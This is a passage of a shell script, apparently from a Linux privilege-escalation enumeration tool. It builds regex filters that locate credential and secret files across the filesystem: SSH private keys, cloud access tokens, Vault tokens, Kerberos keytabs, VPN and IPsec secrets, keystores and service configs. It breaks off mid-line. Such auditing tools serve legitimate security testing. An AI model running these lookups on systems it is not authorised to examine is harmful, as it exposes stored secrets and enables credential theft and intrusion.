PSTORAGE_MONGO=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/private" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e 